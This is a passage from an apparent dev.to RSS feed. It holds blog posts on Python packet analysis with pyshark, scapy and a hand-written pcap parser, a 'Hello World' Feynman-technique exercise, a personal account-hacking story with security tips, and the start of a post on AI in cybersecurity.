&lt;/h2&gt;

&lt;p&gt;Filtering out noise from captured packets makes life much easier. Pyshark passes a Wireshark display filter to tshark, so only the packets that match are parsed and handed to Python.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Let’s see how to filter and count HTTP packets:&lt;/strong&gt;&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import pyshark

# Open the captured packets file with a display filter so that only HTTP packets are parsed
cap = pyshark.FileCapture("packets.pcap", display_filter='http')

# Count the number of HTTP packets
http_count = 0
for pkt in cap:
    http_count += 1
cap.close()

print(f"Total HTTP packets: {http_count}")
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
&lt;h2&gt;
  
  
  Filtering Packets with a Twist:
&lt;/h2&gt;

&lt;p&gt;Let’s take packet filtering to the next level. Pyshark is not only used for simple filtering but also offers a range of powerful filtering options that can make the analysis even more precise.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Look at this more advanced filtering script using Pyshark:&lt;/strong&gt;&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import pyshark

# Open the captured packets file with a compound display filter to focus on specific traffic
cap = pyshark.FileCapture("packets.pcap", display_filter='tcp.port == 80 and ip.dst == 192.168.0.1')

# Count the number of filtered packets
filtered_count = 0
for pkt in cap:
    filtered_count += 1
cap.close()

print(f"Total filtered packets: {filtered_count}")
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;In this example, the display filter targets TCP packets with a destination IP of 192.168.0.1 where either end of the connection uses port 80; tcp.port matches the source or the destination port, so use tcp.dstport == 80 if you only want traffic sent to port 80. Feel free to unleash your creativity and customise the filters based on your specific investigation needs.&lt;/p&gt;

&lt;h2&gt;
  
  
  Adding a Dash of Visualisation:
&lt;/h2&gt;

&lt;p&gt;Now, let’s bring the network forensics findings to life with some eye-catching visualisations. The Matplotlib library is handy, allowing the creation of captivating charts and graphs.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Install Matplotlib library in terminal with the following:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;pip install matplotlib
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Then the scapy library:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;pip install scapy
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Here’s the script that visualises the distribution of IP protocols (TCP, UDP, ICMP and so on) across the captured packets:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;from scapy.all import rdpcap, IP
import matplotlib.pyplot as plt

# Map IPv4 protocol numbers to names so the chart is readable
PROTO_NAMES = {1: "ICMP", 6: "TCP", 17: "UDP"}

# Read the pcap file
packets = rdpcap("packets.pcap")

# Dictionary to store protocol counts
protocol_counts = {}

# Iterate over the captured packets (IPv6 frames carry no IP layer and are skipped)
for pkt in packets:
    if IP in pkt:
        proto = pkt[IP].proto
        name = PROTO_NAMES.get(proto, str(proto))
        protocol_counts[name] = protocol_counts.get(name, 0) + 1

# Prepare data for the diagram
protocols = list(protocol_counts.keys())
count_values = list(protocol_counts.values())

# Plotting the diagram
plt.bar(protocols, count_values)
plt.xlabel('Protocol')
plt.ylabel('Count')
plt.title('Protocol Distribution')
plt.show()
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The script reads the pcap file that was created from Wireshark and iterates over the captured packets, counting the occurrences of different IP protocols. The diagram created provides insights into the protocol distribution, helping to understand the composition of the network traffic captured in the pcap file.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;You’ll be able to witness the occurrences of different IP protocols, all in a beautifully rendered chart:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F2000%2F1%2A3o6xsDCJOzcBgZU1t07URQ.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F2000%2F1%2A3o6xsDCJOzcBgZU1t07URQ.png"&gt;&lt;/a&gt;&lt;/p&gt;
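&lt;p&gt;Both the IP extraction earlier and the protocol chart rely on a library to decode the capture. The added example below (my code, not from the original article) does the decoding by hand with the struct module so you can see what pyshark and scapy are parsing: it builds a tiny three-frame classic pcap in memory (Ethernet, IPv4, then one TCP, UDP and ICMP packet each, with zero checksums; all constructed for the demonstration), walks the record headers while honouring the byte order announced by the magic number, and returns the same per-protocol counts that the scapy script feeds to plt.bar. It reads the classic pcap format only; pcapng, Wireshark’s default save format, has a different block structure.&lt;/p&gt;

```python
import struct
from collections import Counter

# IPv4 protocol numbers as they appear in the header's Protocol field
PROTO_NAMES = {1: "ICMP", 6: "TCP", 17: "UDP"}


def build_sample_pcap():
    """Constructed three-frame classic pcap (little-endian, linktype 1 = Ethernet).
    Checksums are left as zero; this is sample input, not a real capture."""
    def ipv4(proto, payload):
        # version/IHL, DSCP, total length, id, flags/frag, TTL, protocol, checksum, src, dst
        header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64, proto, 0,
                             bytes([10, 0, 0, 5]), bytes([198, 51, 100, 10]))
        return header + payload

    def ethernet(ip_packet):
        # zero dst MAC, zero src MAC, EtherType 0x0800 (IPv4)
        return bytes(6) + bytes(6) + struct.pack("!H", 0x0800) + ip_packet

    def le32(n):
        return n.to_bytes(4, "little")

    frames = [
        ethernet(ipv4(6, struct.pack("!HHIIBBHHH", 40000, 443, 0, 0, 0x50, 0x02, 65535, 0, 0))),  # TCP SYN
        ethernet(ipv4(17, struct.pack("!HHHH", 50000, 53, 8, 0))),                                 # UDP
        ethernet(ipv4(1, struct.pack("!BBHHH", 8, 0, 0, 1, 1))),                                   # ICMP echo
    ]
    # global header: magic, version 2.4, timezone, sigfigs, snaplen, linktype
    out = le32(0xA1B2C3D4) + (2).to_bytes(2, "little") + (4).to_bytes(2, "little")
    out += le32(0) + le32(0) + le32(65535) + le32(1)
    for i, frame in enumerate(frames):
        # record header: ts_sec, ts_usec, captured length, original length
        out += le32(1700000000 + i) + le32(0) + le32(len(frame)) + le32(len(frame)) + frame
    return out


def iter_pcap_records(data):
    """Yield each captured frame from a classic pcap byte string, honouring the byte order
    announced by the magic number. pcapng files have a different layout and are rejected."""
    magic = data[:4]
    if magic == b"\xd4\xc3\xb2\xa1":
        order = "little"
    elif magic == b"\xa1\xb2\xc3\xd4":
        order = "big"
    else:
        raise ValueError("not a classic pcap file")
    offset = 24                      # skip the 24-byte global header
    while len(data) >= offset + 16:  # 16-byte record header precedes every frame
        incl_len = int.from_bytes(data[offset + 8:offset + 12], order)
        offset += 16
        yield data[offset:offset + incl_len]
        offset += incl_len


def parse_frame(frame):
    """Decode Ethernet/IPv4 and return (src, dst, protocol name, src port, dst port).
    Ports are None for protocols other than TCP/UDP; non-IPv4 frames return None."""
    ethertype = struct.unpack("!H", frame[12:14])[0]
    if ethertype != 0x0800:
        return None
    ip = frame[14:]
    ihl = (ip[0] % 16) * 4           # low nibble of the first byte = header length in 32-bit words
    proto = ip[9]
    src = ".".join(str(b) for b in ip[12:16])
    dst = ".".join(str(b) for b in ip[16:20])
    sport = dport = None
    if proto in (6, 17):             # TCP and UDP both begin with source port, destination port
        sport, dport = struct.unpack("!HH", ip[ihl:ihl + 4])
    return src, dst, PROTO_NAMES.get(proto, str(proto)), sport, dport


def protocol_distribution(pcap_bytes):
    """Count frames per IPv4 protocol, the same numbers the scapy script plots."""
    counts = Counter()
    for frame in iter_pcap_records(pcap_bytes):
        parsed = parse_frame(frame)
        if parsed is not None:
            counts[parsed[2]] += 1
    return counts


if __name__ == "__main__":
    sample = build_sample_pcap()
    for frame in iter_pcap_records(sample):
        print(parse_frame(frame))
    print(dict(protocol_distribution(sample)))
```

&lt;p&gt;Reading the captured length from the record header rather than assuming a fixed frame size is what keeps the walk aligned when snaplen truncates frames; hand-rolled parsers that trust the original length instead desynchronise on the first truncated packet.&lt;/p&gt;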

&lt;p&gt;From crafting precise display filters to visualising packet characteristics, Python and Wireshark scripting empowers us to navigate the intricate digital realm with clarity.&lt;/p&gt;

&lt;p&gt;Capture, analyse, filter, and visualise your way to the heart of your network’s darkest mysteries. Happy scripting and may your investigations be as smooth as my packet capture visualisation.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>network</category>
      <category>beginners</category>
      <category>python</category>
    </item>
    <item>
      <title>Hello World meets the Feynman Technique</title>
      <dc:creator>William Baptist</dc:creator>
      <pubDate>Wed, 10 May 2023 21:58:03 +0000</pubDate>
      <link>https://dev.to/baptistsec/solving-hello-world-with-the-feynman-technique-1kbd</link>
      <guid>https://dev.to/baptistsec/solving-hello-world-with-the-feynman-technique-1kbd</guid>
      <description>&lt;p&gt;Imagine taking a simple one-liner in Python and turning it into a more complex program that you have to explain to a toddler. Sound like a challenge? Well, it certainly was for me.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;To guide me through the process, I decided to use the powerful and effective Feynman Technique, which follows the following four steps:&lt;/strong&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Step 1: Choose a Concept
&lt;/h2&gt;

&lt;p&gt;The first step of the Feynman Technique is to choose a concept that you want to understand. In my case, I wanted to understand the basics of Python programming and how to create a “Hello World” program that was more complex than the usual one-liner.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;I went back to basics with Python and experimented with the different code snippets below:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# How most people would (and should) print Hello, World!
print("Hello, World!")

# Using variables in a Hello, World!
message = "Hello, World!"
print(message)

# Adding user input to a "Hello World" program
name = input("What is your name? ")
print("Hello " + name)

# Adding a loop to the Hello, World! program
for i in range(5):
    print("Hello, World!")
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
&lt;h2&gt;
  
  
  Step 2: Teach it to a Toddler
&lt;/h2&gt;

&lt;p&gt;The second step of the Feynman Technique, of course, is to teach the concept to a toddler. If I can explain it in simple terms that a child can understand, then it helps two people. So, luckily for me (and him), it was my grandfather’s birthday recently, so I decided to explain the basics of Python programming to my little cousin, who is six years old. I started by showing him some simple Python code and explaining what each line did.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--5dv6D4yf--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/10368/1%2AA-Rxip4hB2oaKf5-j8crdg.jpeg" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--5dv6D4yf--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/10368/1%2AA-Rxip4hB2oaKf5-j8crdg.jpeg" alt="Photo by [Lauren McConachie](https://unsplash.com/@coldwisper?utm_source=unsplash&amp;amp;utm_medium=referral&amp;amp;utm_content=creditCopyText)" width="800" height="533"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I used analogies and examples to help him understand, and I tried to make it fun by turning it into a game. I explained conditional statements by comparing them with a traffic light. When the light is green, you can go, but when it is red, you have to stop. Similarly, in a program, if a certain condition is met, you can execute a set of instructions, but if it is not met, you can execute a different set of instructions. By the end of our lesson, he was able to create his own “Hello World” program and, to my surprise, was excited to learn more.&lt;/p&gt;
&lt;h2&gt;
  
  
  Step 3: Identify Gaps and Fill Them
&lt;/h2&gt;

&lt;p&gt;The third step of the Feynman Technique is to identify any gaps in your understanding and fill them in. After teaching my little cousin about Python, I realised that there were still some areas that were hard to teach to people who weren’t already proficient in coding. My cousin had trouble understanding why we needed to use variables and how they were different from one another. To overcome this challenge, I used another simple analogy to explain the concept. I told him that variables were like containers that we use to store different types of things, such as toys or clothes. Just like we use different containers for different things, we use different variables to store different types of data, such as numbers or words.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--93D2kvfp--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/8000/1%2AxvrwYanaGpPBmqxtiYbhxg.jpeg" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--93D2kvfp--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/8000/1%2AxvrwYanaGpPBmqxtiYbhxg.jpeg" alt="Photo by [Annie Spratt](https://unsplash.com/@anniespratt?utm_source=unsplash&amp;amp;utm_medium=referral&amp;amp;utm_content=creditCopyText)" width="800" height="567"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I found that explaining the concept of object-oriented programming to someone without any prior knowledge of coding can be a bit challenging. However, through further research and practice, I was able to strengthen my understanding and break down the topic in a more approachable way. By the end of this step, I felt confident in my ability to explain the more complex “Hello, World!” program.&lt;/p&gt;
&lt;h2&gt;
  
  
  Step 4: Simplify and Use Analogies
&lt;/h2&gt;

&lt;p&gt;The fourth and final step of the Feynman Technique is to simplify the concept and use analogies to help explain it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Here’s what my “complex” Hello World program looks like:&lt;/strong&gt;&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import random

def get_greeting():
    greetings = ["Hello", "Hi", "Hey", "Greetings"]
    return random.choice(greetings)

def get_name():
    name = input("What's your name? ")
    return name

def greet():
    greeting = get_greeting()
    name = get_name()
    print(f"{greeting} {name}, welcome to my program!")

if __name__ == "__main__":
    greet()
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--tb2yzE9Q--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/2000/1%2AotqYDBPxPP3wI6pGlF3cag.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--tb2yzE9Q--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/2000/1%2AotqYDBPxPP3wI6pGlF3cag.png" alt="Terminal output" width="276" height="124"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Let’s say we threw a surprise party for my grandpa’s birthday. We want to greet him with a random greeting from a list of possible greetings and also ask him for his name so we can address him properly.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--l5cnkdFj--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/9086/1%2AIvC_KxTRQOpdzIzepkJRyw.jpeg" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--l5cnkdFj--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/9086/1%2AIvC_KxTRQOpdzIzepkJRyw.jpeg" alt="Photo by [RDNE Stock project](https://www.pexels.com/photo/an-elderly-man-wearing-sunglasses-and-a-party-hat-7867915/)" width="800" height="533"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import random
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;We need to import the random module from Python to randomly choose a greeting from the list of greetings that we have prepared.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;def get_greeting():
    greetings = ["Hello", "Hi", "Hey", "Greetings"]
    return random.choice(greetings)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;We need to define a function called get_greeting() that will randomly choose a greeting from a list of possible greetings. In the party analogy, this is like having a box of greeting cards with different messages. Someone will randomly pick one card and read the message to our grandad.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;def get_name():
    name = input("What's your name? ")
    return name
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;We also need to define a function called get_name() that will ask my grandpa for his name. In our party analogy, this is like having a guestbook where I ask my grandpa to write down his name. The input() function in Python will allow me to get his name as input from the keyboard.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;def greet():
    greeting = get_greeting()
    name = get_name()
    print(f"{greeting} {name}, welcome to my program!")
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Finally, we define the main function greet() that will put everything together. In our party analogy, this is like having a host who will read the greeting card to my grandad and address him properly by his name. The print() function in Python will allow the display of a greeting and the grandad's name on the screen.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;if __name__ == "__main__":
    greet()
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;This line of code is a bit technical, but it’s important to include. It basically checks if the code is being run as the main program or if it is being imported as a module. In this party analogy, this is like having my mother at the entrance of the party who will only allow guests who were invited by us to enter. If the code is run as the main program (which is what we want), then it will call the greet() function and start the party by displaying the greeting to my grandad.&lt;/p&gt;

&lt;p&gt;Through the four steps of choosing a concept, teaching it to a toddler, identifying gaps, and simplifying with analogies, I was able to turn a simple “Hello World” program into a more complex program. The Feynman Technique can be used in any subject, and I would highly recommend it to anyone looking to improve their understanding of a topic.&lt;/p&gt;

</description>
      <category>python</category>
      <category>feynman</category>
      <category>productivity</category>
      <category>learning</category>
    </item>
    <item>
      <title>I Was Hacked: What I’ve Learned Since</title>
      <dc:creator>William Baptist</dc:creator>
      <pubDate>Wed, 10 May 2023 10:01:53 +0000</pubDate>
      <link>https://dev.to/baptistsec/i-was-hacked-what-ive-learned-since-en2</link>
      <guid>https://dev.to/baptistsec/i-was-hacked-what-ive-learned-since-en2</guid>
      <description>&lt;p&gt;It was Easter 2018. I was still in high school, and like many teenagers, I was a bit reckless. I signed up for a website that promised safety, unaware of its history of data breaches. Little did I know that my personal information, along with that of thousands of other users, was at risk from the moment I signed up. What followed was a startling truth about cybersecurity that many people still find hard to admit.&lt;/p&gt;

&lt;p&gt;Fast forward to 2021, and I’m a college student who has developed a deep interest in cybersecurity. I devoured countless articles that preached about the gospel of three-factor authentication, but let’s be real: theory is nothing without practical application. Little did I know, a real-world problem was lurking around the corner, ready to test my knowledge and skills.&lt;/p&gt;

&lt;p&gt;It all began with a notification on my phone from an old Amazon account. The message informed me that my account had been used to purchase a high-end camera and lens worth several thousand pounds. The destination? Grimsby, of all places.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F2000%2F1%2A4nwzXc-ZAjcU1_F912jk-Q.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F2000%2F1%2A4nwzXc-ZAjcU1_F912jk-Q.png" alt="Photo by [Chris Hoffman](https://www.google.com/url?sa=i&amp;amp;url=https%3A%2F%2Fwww.howtogeek.com%2F297098%2Fhow-to-stop-amazons-email-text-or-smartphone-app-notifications%2F&amp;amp;psig=AOvVaw0MsJZHv-CQIhlT_w5I-K8H&amp;amp;ust=1683748732313000&amp;amp;source=images&amp;amp;cd=vfe&amp;amp;ved=0CBAQjRxqFwoTCIju8KKD6f4CFQAAAAAdAAAAABAE)"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;To my surprise, I was able to log in even though it was quite clear that it had been compromised. As I delved deeper later, I discovered that there was a way to bypass the two-factor authentication system. All that was needed was an Amazon email and password, which allowed the perpetrator to order items without any hassle.&lt;/p&gt;

&lt;p&gt;The irony of the situation hit me hard. I thought I had taken all the necessary precautions and followed the cybersecurity protocols I had learned in college. But as it turns out, all it takes is one small mistake to compromise your entire digital defensive framework.&lt;/p&gt;

&lt;p&gt;As I reflect on this experience, I can’t help but acknowledge the emotional impact it had on me. Back in high school, I was careless, and there was far less at stake. But when I learned that my data had been breached, I felt violated and exposed. It was a wake-up call that made me realise the importance of proactive cybersecurity and motivated me to take action.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F12000%2F1%2AizgbTaPzC2nYEoFa_66pew.jpeg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F12000%2F1%2AizgbTaPzC2nYEoFa_66pew.jpeg" alt="Photo by [Nils Huenerfuerst](https://unsplash.com/@nhuenerfuerst?utm_source=unsplash&amp;amp;utm_medium=referral&amp;amp;utm_content=creditCopyTex)"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;I refused to be a victim again, so after (eventually) getting a refund from Amazon and resetting everything, I devised a plan:&lt;/strong&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Actively monitoring accounts
&lt;/h2&gt;

&lt;p&gt;If I had known that the accounts that had access to my financial information were breached, then this entire incident could have been avoided. I started regularly checking my accounts for suspicious activity or logins from unknown devices. I checked sites like &lt;a href="https://www.google.com/url?sa=t&amp;amp;rct=j&amp;amp;q=&amp;amp;esrc=s&amp;amp;source=web&amp;amp;cd=&amp;amp;cad=rja&amp;amp;uact=8&amp;amp;ved=2ahUKEwiQluPU4uj-AhUUecAKHV40C4YQFnoECA4QAQ&amp;amp;url=https%3A%2F%2Fhaveibeenpwned.com%2F&amp;amp;usg=AOvVaw1ItcUHGRUxCGZ4-dkp3Qv7" rel="noopener noreferrer"&gt;haveibeenpwned.com&lt;/a&gt; regularly for every email I use. I then set up alerts and notifications to keep me informed about any unauthorised access to my accounts. If any suspicious activity was detected, I could act quickly and change passwords, revoke access, or contact support. I also recognised the benefit of using active monitoring software such as &lt;a href="//sentrypc.7eer.net/deal"&gt;SentryPC&lt;/a&gt; that does a lot of the steps for you without so much effort.&lt;/p&gt;

&lt;h2&gt;
  
  
  Account diversification
&lt;/h2&gt;

&lt;p&gt;Diversifying your accounts isn’t just a practice reserved for stock portfolios. After experiencing a cybersecurity nightmare, I realised the importance of diversifying my email accounts. Rather than relying on a single account for all my financial information, I decided to create multiple accounts for different purposes. This way, if one account were to be compromised, the others would remain secure. There are different approaches to diversifying accounts, including using different usernames, passwords, and emails for each account, depending on how much security you desire.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F11830%2F1%2Aulo9N1KApQE70Eew0RG_uw.jpeg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F11830%2F1%2Aulo9N1KApQE70Eew0RG_uw.jpeg" alt="Photo by [Joshua Woroniecki](https://www.pexels.com/photo/a-hand-holding-white-card-on-top-of-a-laptop-5031038/)"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Two-step verification for every account
&lt;/h2&gt;

&lt;p&gt;Relying solely on different passwords clearly wasn’t enough, even if I used a diversification system for my accounts. I decided to implement a two-step verification process for all my accounts. I chose a mobile app-based verification process that required a one-time password (OTP).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Here’s an example of how to enable two-step authentication for your Google account:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Go to your Google Account &lt;a href="https://www.google.com/account/about/?hl=en" rel="noopener noreferrer"&gt;settings&lt;/a&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Go to the Security tab.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Click on the 2-Step Verification section.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Provide your phone number so you can receive a verification code via text message or set up an authentication app, such as Google &lt;a href="https://play.google.com/store/apps/details?id=com.google.android.apps.authenticator2&amp;amp;hl=en&amp;amp;gl=US" rel="noopener noreferrer"&gt;Authenticator&lt;/a&gt; or &lt;a href="https://authy.com/" rel="noopener noreferrer"&gt;Authy&lt;/a&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Once two-step verification is set up you will be prompted to enter a verification code after entering your password. This code will be sent to your phone or generated by your authentication app depending on the app you chose.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Honeypotting
&lt;/h2&gt;

&lt;p&gt;Finally, I decided to somewhat controversially set up fake accounts with enticing information to draw hackers away from my actual data.&lt;br&gt;
This technique of setting up fake accounts to attract hackers is called honeypotting and is commonly used as a cybersecurity strategy to deceive attackers and protect sensitive data. I created multiple fake accounts on different platforms, using fake names and personal information that hackers would find attractive. This way, hackers would be drawn to these fake accounts instead of my real ones, providing an additional layer of protection.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;For your honeypot accounts, I would recommend a variety of different types of enticing information, including:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Creating a fake email account with the subject line “passwords” or “account information”.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Creating a fake social media account which appeared to leak personal information (that is all fabricated).&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Changing an old account you’ve had on a secure website for a while to also appear to leak personal information.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F2560%2F1%2AZ13KoZ-xIgCNxwuccCJm8w.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F2560%2F1%2AZ13KoZ-xIgCNxwuccCJm8w.png" alt="Photo by [Kenny Eliason](https://unsplash.com/de/@neonbrand?utm_source=unsplash&amp;amp;utm_medium=referral&amp;amp;utm_content=creditCopyText)"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I have found that intentionally wasting the time of someone who is attempting to steal your personal information can significantly enhance your online security. While I do acknowledge that making honeypots can be time-consuming and demands continuous attention to upkeep, I personally find it rewarding to study the techniques attackers use.&lt;/p&gt;

&lt;p&gt;Through this experience, I came to understand that cybersecurity is not just a buzzword; it’s a critical aspect of our digital lives that cannot be taken lightly. It’s easy to be passive when you see yourself as a defender, but most of the time the best form of defence is attack, and the real challenge lies in implementing this mindset in our daily lives. And for me, that meant learning from my mistakes and taking the necessary steps to secure my online presence, which is what my plan hopefully shows you.&lt;/p&gt;

</description>
      <category>hacked</category>
      <category>cybersecurity</category>
      <category>beginners</category>
      <category>security</category>
    </item>
    <item>
      <title>AI Helps Make Cybersecurity Simple in 2023</title>
      <dc:creator>William Baptist</dc:creator>
      <pubDate>Tue, 09 May 2023 23:44:15 +0000</pubDate>
      <link>https://dev.to/baptistsec/ai-helps-make-cybersecurity-simple-in-2023-21df</link>
      <guid>https://dev.to/baptistsec/ai-helps-make-cybersecurity-simple-in-2023-21df</guid>
      <description>&lt;p&gt;When it comes to AI and cybersecurity in 2023, I’ve got to say, count me in! I’m not just cautiously optimistic; I’m downright enthusiastic. In fact, I think AI might just be the hero that cybersecurity needs right now.&lt;/p&gt;

&lt;p&gt;As cyber threats become more sophisticated, traditional security measures like firewalls and antivirus software are unfortunately no longer sufficient. To keep up with evolving threats, I, among others in this field, have increasingly started turning to artificial intelligence (AI) to help defend against attacks. In this article, I explore the specific tools and techniques available for cybersecurity professionals to harness AI effectively.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Please note that throughout this article I use the British spelling of words other than the code, which had to be written using American English.&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Machine Learning for Threat Detection
&lt;/h2&gt;

&lt;p&gt;One of the most promising applications of AI in cybersecurity is in threat detection. By training machine learning models on large datasets of past attacks, these models can learn to identify new threats and respond more quickly and effectively than traditional signature-based approaches.&lt;/p&gt;

